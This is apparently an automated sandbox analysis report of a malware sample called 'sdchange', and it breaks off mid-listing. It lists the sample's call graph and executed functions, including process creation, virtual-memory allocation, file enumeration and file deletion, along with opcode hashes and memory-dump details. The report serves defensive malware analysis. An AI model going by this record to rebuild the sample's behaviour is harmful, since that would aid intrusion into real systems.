97918 2712116 97916->97918 97922 2728840 97916->97922 97926 27292c0 97918->97926 97921 271212b 97923 272885d 97922->97923 97931 46d2c0a 97923->97931 97924 2728889 97924->97918 97927 272934f 97926->97927 97929 27292ee 97926->97929 97934 46d2e80 LdrInitializeThunk 97927->97934 97928 2729380 97928->97921 97929->97921 97932 46d2c1f LdrInitializeThunk 97931->97932 97933 46d2c11 97931->97933 97932->97924 97933->97924 97934->97928 98158 2729090 98159 2729134 98158->98159 98161 27290bb 98158->98161 98160 272914a NtReadFile 98159->98160 98167 2718614 98168 2718624 98167->98168 98169 27185c8 98168->98169 98171 2716ee0 98168->98171 98172 2716ef6 98171->98172 98174 2716f2f 98171->98174 98172->98174 98175 2716d50 LdrLoadDll 98172->98175 98174->98169 98175->98174 98176 2709e16 98178 2709dc7 98176->98178 98179 2709e19 98176->98179 98177 2709e10 98178->98177 98180 2709dfd CreateThread 98178->98180 98182 270a3a6 98179->98182 98183 272af50 98179->98183 98184 272af76 98183->98184 98189 2704070 98184->98189 98186 272af82 98187 272afbb 98186->98187 98192 2725340 98186->98192 98187->98182 98196 2713050 98189->98196 98191 270407d 98191->98186 98193 27253a2 98192->98193 98194 27253af 98193->98194 98207 2711820 98193->98207 98194->98187 98197 271306d 98196->98197 98199 2713086 98197->98199 98200 2729c90 98197->98200 98199->98191 98201 2729caa 98200->98201 98202 2729cd9 98201->98202 98203 2728840 LdrInitializeThunk 98201->98203 98202->98199 98204 2729d36 98203->98204 98205 272b2f0 RtlFreeHeap 98204->98205 98206 2729d4f 98205->98206 98206->98199 98208 271185b 98207->98208 98223 2717c80 98208->98223 98210 2711863 98211 272b3d0 RtlAllocateHeap 98210->98211 98221 2711b40 98210->98221 98212 2711879 98211->98212 98213 272b3d0 RtlAllocateHeap 98212->98213 98214 271188a 98213->98214 98215 272b3d0 RtlAllocateHeap 98214->98215 98216 271189b 98215->98216 98222 2711935 98216->98222 98238 2716850 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98216->98238 98218 27143a0 LdrLoadDll 98219 2711af2 98218->98219 98234 2727c80 98219->98234 98221->98194 98222->98218 98224 2717cac 98223->98224 98225 2717b70 2 API calls 98224->98225 98226 2717ccf 98225->98226 98227 2717cf1 98226->98227 98228 2717cd9 98226->98228 98230 2717d0d 98227->98230 98232 2729220 NtClose 98227->98232 98229 2717ce4 98228->98229 98231 2729220 NtClose 98228->98231 98229->98210 98230->98210 98231->98229 98233 2717d03 98232->98233 98233->98210 98235 2727ce1 98234->98235 98237 2727cee 98235->98237 98239 2711b50 98235->98239 98237->98221 98238->98222 98257 2717f50 98239->98257 98241 27120c6 98241->98237 98242 2711b70 98242->98241 98261 2720ec0 98242->98261 98245 2711d7c 98246 272c4c0 2 API calls 98245->98246 98250 2711d91 98246->98250 98247 2711bcb 98247->98241 98264 272c390 98247->98264 98248 2717ef0 LdrInitializeThunk 98252 2711de1 98248->98252 98249 27255b0 LdrInitializeThunk 98249->98252 98250->98252 98269 2710670 98250->98269 98252->98241 98252->98248 98252->98249 98253 2710670 LdrInitializeThunk 98252->98253 98253->98252 98255 2711f32 98255->98252 98256 2717ef0 LdrInitializeThunk 98255->98256 98272 27255b0 98255->98272 98256->98255 98258 2717f5d 98257->98258 98259 2717f85 98258->98259 98260 2717f7e SetErrorMode 98258->98260 98259->98242 98260->98259 98262 272b260 NtAllocateVirtualMemory 98261->98262 98263 2720ee1 98262->98263 98263->98247 98265 272c3a0 98264->98265 98266 272c3a6 98264->98266 98265->98245 98267 272b3d0 RtlAllocateHeap 98266->98267 98268 272c3cc 98267->98268 98268->98245 98276 27294b0 98269->98276 98273 2725612 98272->98273 98275 2725623 98273->98275 98281 27176c0 98273->98281 98275->98255 98277 27294cd 98276->98277 98280 46d2c70 LdrInitializeThunk 98277->98280 98278 2710692 98278->98255 98280->98278 98282 27175f0 98281->98282 98283 2710670 LdrInitializeThunk 98282->98283 98285 2717728 98282->98285 98284 27176ae 98283->98284 98284->98275 98286 2717217 98287 27171ad 98286->98287 98290 271720a 98286->98290 98288 271b060 9 API calls 98287->98288 98289 27171b2 98288->98289 97936 2720a5f 97938 2716200 LdrInitializeThunk 97936->97938 97937 27209f6 97937->97936 97938->97937 97939 2717140 97940 27171b2 97939->97940 97941 2717158 97939->97941 97941->97940 97943 271b060 97941->97943 97944 271b086 97943->97944 97945 271b2ad 97944->97945 97970 2729620 97944->97970 97945->97940 97947 271b0fc 97947->97945 97973 272c4c0 97947->97973 97949 271b11b 97949->97945 97950 271b1ec 97949->97950 97951 2728840 LdrInitializeThunk 97949->97951 97952 2715960 LdrInitializeThunk 97950->97952 97956 271b208 97950->97956 97953 271b17d 97951->97953 97952->97956 97953->97950 97954 271b186 97953->97954 97954->97945 97958 271b1b5 97954->97958 97965 271b1d4 97954->97965 97979 2715960 97954->97979 97955 271b295 97963 2717ef0 LdrInitializeThunk 97955->97963 97956->97955 97982 27283b0 97956->97982 97957 2717ef0 LdrInitializeThunk 97962 271b1e2 97957->97962 97997 27244d0 LdrInitializeThunk 97958->97997 97962->97940 97966 271b2a3 97963->97966 97964 271b26c 97987 2728460 97964->97987 97965->97957 97966->97940 97968 271b286 97992 27285c0 97968->97992 97971 272963a 97970->97971 97972 272964b CreateProcessInternalW 97971->97972 97972->97947 97974 272c430 97973->97974 97975 272c48d 97974->97975 97976 272b3d0 RtlAllocateHeap 97974->97976 97975->97949 97977 272c46a 97976->97977 97978 272b2f0 RtlFreeHeap 97977->97978 97978->97975 97998 2728a10 97979->97998 97981 271599e 97981->97958 97983 272842d 97982->97983 97985 27283de 97982->97985 98004 46d39b0 LdrInitializeThunk 97983->98004 97984 2728452 97984->97964 97985->97964 97988 27284da 97987->97988 97989 272848b 97987->97989 98005 46d4340 LdrInitializeThunk 97988->98005 97989->97968 97990 27284ff 97990->97968 97993 272863d 97992->97993 97995 27285ee 97992->97995 98006 46d2fb0 LdrInitializeThunk 97993->98006 97994 2728662 97994->97955 97995->97955 97997->97965 97999 2728a3e 97998->97999 98000 2728abd 97998->98000 97999->97981 98003 46d2d10 LdrInitializeThunk 98000->98003 98001 2728b02 98001->97981 98003->98001 98004->97984 98005->97990 98006->97994 98007 2716bc0 98008 2716bea 98007->98008 98011 2717d20 98008->98011 98010 2716c14 98012 2717d3d 98011->98012 98018 2728930 98012->98018 98014 2717d8d 98015 2717d94 98014->98015 98016 2728a10 LdrInitializeThunk 98014->98016 98015->98010 98017 2717dbd 98016->98017 98017->98010 98019 27289cb 98018->98019 98020 272895e 98018->98020 98023 46d2f30 LdrInitializeThunk 98019->98023 98020->98014 98021 2728a04 98021->98014 98023->98021 98024 271c3c0 98026 271c3e9 98024->98026 98025 271c4ed 98026->98025 98027 271c493 FindFirstFileW 98026->98027 98027->98025 98029 271c4ae 98027->98029 98028 271c4d4 FindNextFileW 98028->98029 98030 271c4e6 FindClose 98028->98030 98029->98028 98030->98025 98031 2712f43 98036 2717b70 98031->98036 98034 2712f6f 98035 2729220 NtClose 98035->98034 98037 2717b8a 98036->98037 98041 2712f53 98036->98041 98042 27288e0 98037->98042 98040 2729220 NtClose 98040->98041 98041->98034 98041->98035 98043 27288fd 98042->98043 98046 46d35c0 LdrInitializeThunk 98043->98046 98044 2717c5a 98044->98040 98046->98044 98291 2729180 98292 27291f7 98291->98292 98294 27291ae 98291->98294 98293 272920d NtDeleteFile 98292->98293 98047 2710c4b PostThreadMessageW 98048 2710c5d 98047->98048 98049 46d2ad0 LdrInitializeThunk

                                                                                                                      Executed Functions

                                                                                                                      Function 02709E20 Relevance: 27.8, Strings: 22, Instructions: 290COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 91 2709e20-270a0f2 92 270a0f9-270a100 91->92 93 270a132-270a13c 92->93 94 270a102-270a130 92->94 95 270a14d-270a156 93->95 94->92 96 270a158-270a167 95->96 97 270a169-270a16d 95->97 96->95 98 270a1a5-270a1b6 97->98 99 270a16f-270a1a3 97->99 101 270a1c7-270a1d3 98->101 99->97 102 270a1d5-270a1e4 101->102 103 270a1e6-270a1f7 101->103 102->101 104 270a208-270a20f 103->104 106 270a211-270a236 104->106 107 270a238 104->107 106->104 108 270a23f-270a248 107->108 110 270a356-270a360 108->110 111 270a24e-270a258 108->111 113 270a371-270a37a 110->113 112 270a269-270a275 111->112 114 270a277-270a289 112->114 115 270a28b-270a2a3 112->115 116 270a398-270a39f 113->116 117 270a37c-270a388 113->117 114->112 118 270a2a5-270a2af 115->118 119 270a2fe-270a308 115->119 123 270a3a1 call 272af50 116->123 124 270a3f6-270a40f 116->124 121 270a396 117->121 122 270a38a-270a390 117->122 128 270a2c0-270a2c9 118->128 126 270a319-270a325 119->126 121->113 122->121 130 270a3a6-270a3af 123->130 124->124 127 270a411-270a418 124->127 131 270a347-270a351 126->131 132 270a327-270a334 126->132 133 270a445-270a44e 127->133 134 270a41a-270a443 127->134 135 270a2e1-270a2fa 128->135 136 270a2cb-270a2d4 128->136 138 270a3b1-270a3c9 130->138 139 270a3cb-270a3d5 130->139 131->108 140 270a345 132->140 141 270a336-270a33f 132->141 134->127 135->135 137 270a2fc 135->137 142 270a2d6-270a2dc 136->142 143 270a2df 136->143 137->110 138->130 139->124 144 270a3d7-270a3f4 139->144 140->126 141->140 142->143 143->128 144->139
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$)S$7O$AvhU$Eh$K$LT$R.$Tz$U$^$b$h$hU$p$q$r$s$t${$m$u
                                                                                                                      • API String ID: 0-2504679547
                                                                                                                      • Opcode ID: a75e83c42f2f9fd67e807c0057357514b14d205e9f9892602770c764c1b19a40
                                                                                                                      • Instruction ID: 527b50b4838958ebc0119ba89d3e790705b2ebe98dca2616763d233477ffe2ad
                                                                                                                      • Opcode Fuzzy Hash: a75e83c42f2f9fd67e807c0057357514b14d205e9f9892602770c764c1b19a40
                                                                                                                      • Instruction Fuzzy Hash: 62F17BB0905269CBEB64CF45C8987DDBBB2BB45308F1085D9D60E7B281CBB95AC8CF45
                                                                                                                      Function 0271C3C0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0271C4A4
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0271C4DF
                                                                                                                      • FindClose.KERNELBASE(?), ref: 0271C4EA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 680b19f4c8adf54fc6476685db503487a090742cea296c2ab8d9ab89c0d5ea54
                                                                                                                      • Instruction ID: cd47e5da3c482c860c40cd8e9ed9d9bbdf2a3bdc3469ec5109fcacbb0dd8751b
                                                                                                                      • Opcode Fuzzy Hash: 680b19f4c8adf54fc6476685db503487a090742cea296c2ab8d9ab89c0d5ea54
                                                                                                                      • Instruction Fuzzy Hash: 0F31A3B1940208BBDB22EBA4CC85FFF777CAF44748F14455DF948A6190D774AB848BA1
                                                                                                                      Function 02728F20 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,3AF608A6,?,?,?,?,?,?), ref: 0272901B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 8371b61dc51180fe31843f5f92102e3747ac81664409a6ff066d1dcd20a62601
                                                                                                                      • Instruction ID: 8ba758b0fa8ec4e08ca83e27aea6963b1d9db71d361c8558a15a410805061494
                                                                                                                      • Opcode Fuzzy Hash: 8371b61dc51180fe31843f5f92102e3747ac81664409a6ff066d1dcd20a62601
                                                                                                                      • Instruction Fuzzy Hash: 6C31E4B5A01608AFCB14DF99C884EEEB7F9EF88304F108219F919A7240D730A905CFA4
                                                                                                                      Function 02729090 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(?,?,?,?,3AF608A6,?,?,?,?), ref: 02729173
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 363d1c614bdea2ea8d131ff0f18e1076fb02b11b31a8fba30c4cdc2184518e50
                                                                                                                      • Instruction ID: 9f9585d329348b00cace6667829e0c3f053633eb34a822b0e46a13650cc02150
                                                                                                                      • Opcode Fuzzy Hash: 363d1c614bdea2ea8d131ff0f18e1076fb02b11b31a8fba30c4cdc2184518e50
                                                                                                                      • Instruction Fuzzy Hash: 2631E4B5A00608AFDB14DF99D884EEFB7F9EF88714F108619F919A7240D730A915CFA0
                                                                                                                      Function 02729390 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(02711BCB,?,02727CEE,00000000,3AF608A6,00003000,?,?,?,?,?,02727CEE,02711BCB), ref: 02729458
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: 2e96346cd888554b81c2315bd80df40aa4ec7f84d24647ce4dce7f1becf68693
                                                                                                                      • Instruction ID: 13c7f993a374f7e69dea261cafe330ca818e81b9b21402bf1e0600e5c9e971ca
                                                                                                                      • Opcode Fuzzy Hash: 2e96346cd888554b81c2315bd80df40aa4ec7f84d24647ce4dce7f1becf68693
                                                                                                                      • Instruction Fuzzy Hash: 652108B5A00218ABDB10DFA9DC45EEFB7B9EF88704F108619F909A7240D770A915CFA5
                                                                                                                      Function 02729180 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 47cdb84c0923d97f1e72baa756cba3c7f5b25e1d6c3d7a9036ddf48ff7e18aba
                                                                                                                      • Instruction ID: c68168cf4d18d413cd12a7827324931e8277dc895c3f6e9259a04116ff90f1f0
                                                                                                                      • Opcode Fuzzy Hash: 47cdb84c0923d97f1e72baa756cba3c7f5b25e1d6c3d7a9036ddf48ff7e18aba
                                                                                                                      • Instruction Fuzzy Hash: 57115E75601618BBD720EB69CC45FEF77ADDF85704F10861DFA0867281DA70BA098FA1
                                                                                                                      Function 02729220 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02729254
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Offset: 02700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_2700000_sdchange.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 4fd420b1cf45f968bd5c101bb5892aae1e7638fed89652d678df022ed48024bd
                                                                                                                      • Instruction ID: 0c56f8f181c7d6f76a6d53636adc3dc2bafd0aa3f0675523c83e6dc7a35c179d
                                                                                                                      • Opcode Fuzzy Hash: 4fd420b1cf45f968bd5c101bb5892aae1e7638fed89652d678df022ed48024bd
                                                                                                                      • Instruction Fuzzy Hash: 37E04636200314BBD620AA69DC48FAB77ADDBC9714F014419FA08A7240C670B9058AF4
                                                                                                                      Function 046D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 0985eead5a3750cb369f11255b06a410f6f91c05d2cbce4cf445152c1d1ab15b
                                                                                                                      • Instruction ID: 5280eb2f4152caabe642188a7e8c914d31a180d4cff483ebd46997d33903f5f7
                                                                                                                      • Opcode Fuzzy Hash: 0985eead5a3750cb369f11255b06a410f6f91c05d2cbce4cf445152c1d1ab15b
                                                                                                                      • Instruction Fuzzy Hash: F2900261602500426140755D480441660459BE1305395C115A0555B60D9618D955A269
                                                                                                                      Function 046D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2f9a7b0d182a0f50d524e0ddda45262f75f7aeaecbb5cc68086c6446834cd0d6
                                                                                                                      • Instruction ID: 0033689addb64ff222df8a78a5e9a63d10006511781fca94d19b308b0538b1d3
                                                                                                                      • Opcode Fuzzy Hash: 2f9a7b0d182a0f50d524e0ddda45262f75f7aeaecbb5cc68086c6446834cd0d6
                                                                                                                      • Instruction Fuzzy Hash: A790023160680012B140755D488455640459BE0305B55C011E0425B54D9A14DA566361
                                                                                                                      Function 046D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 063a738f42766892dbc13223dcdb80faa898fb024c241fa884adbfd66bf623f6
                                                                                                                      • Instruction ID: 667d53096107eefa93c127bd386fdfd866c6ef9a4081fab3ba2d6b65f393bd2c
                                                                                                                      • Opcode Fuzzy Hash: 063a738f42766892dbc13223dcdb80faa898fb024c241fa884adbfd66bf623f6
                                                                                                                      • Instruction Fuzzy Hash: C590023120240842F100755D4404B5600458BE0305F55C016A0125B54E9615D9517521
                                                                                                                      Function 046D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 674ddf308ac683730f07df634a2d3cfb22f1992e78b5fd14c2e199bb0e4b36c9
                                                                                                                      • Instruction ID: 6b499593dbf9803feed5068daebd89ab80cea7a667a83a0f57e5a67c31e99b9a
                                                                                                                      • Opcode Fuzzy Hash: 674ddf308ac683730f07df634a2d3cfb22f1992e78b5fd14c2e199bb0e4b36c9
                                                                                                                      • Instruction Fuzzy Hash: 0890023120248802F110755D840475A00458BD0305F59C411A4425B58E9695D9917121
                                                                                                                      Function 046D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3366119f18314f699828b74acd72c2903ed4c1daac8324de48d1f8a1d158bf69
                                                                                                                      • Instruction ID: fb086b5f2440f4c9bd2ad93cefd7c5cf3a7d638004fa77461827901b5ac5e603
                                                                                                                      • Opcode Fuzzy Hash: 3366119f18314f699828b74acd72c2903ed4c1daac8324de48d1f8a1d158bf69
                                                                                                                      • Instruction Fuzzy Hash: 6990023120240402F100799D540865600458BE0305F55D011A5025B55FD665D9917131
                                                                                                                      Function 046D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 98d9047478cf3e0540feca5d16e589dfb696eb160b5e16219b393cf8232e4a5f
                                                                                                                      • Instruction ID: 69dc4b6f18ac3ef7198856af256c3aaa8cf997cc90d1ec4fb4f007b60f053008
                                                                                                                      • Opcode Fuzzy Hash: 98d9047478cf3e0540feca5d16e589dfb696eb160b5e16219b393cf8232e4a5f
                                                                                                                      • Instruction Fuzzy Hash: F590022130240003F140755D54186164045DBE1305F55D011E0415B54DE915D9566222
                                                                                                                      Function 046D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 381169d49e54aade330b5d1a8c365e719b15fd77db422a558609682f08927439
                                                                                                                      • Instruction ID: 99f6e7d41267e9d742d668910e6d1905cb6d5822dcceb812e2106ed26cc3de08
                                                                                                                      • Opcode Fuzzy Hash: 381169d49e54aade330b5d1a8c365e719b15fd77db422a558609682f08927439
                                                                                                                      • Instruction Fuzzy Hash: BD90022921340002F180755D540861A00458BD1206F95D415A0016B58DD915D9696321
                                                                                                                      Function 046D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: eedddebd7024f0109fd33f1ce07bbf574ab99ecf21e60518ec293b264522f368
                                                                                                                      • Instruction ID: 678941e0bcc17f4001726e2bf7ac1708e635c4c9aef1e39bf442e7d60034953c
                                                                                                                      • Opcode Fuzzy Hash: eedddebd7024f0109fd33f1ce07bbf574ab99ecf21e60518ec293b264522f368
                                                                                                                      • Instruction Fuzzy Hash: 4390023120240413F111755D450471700498BD0245F95C412A0425B58EA656DA52B121
                                                                                                                      Function 046D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
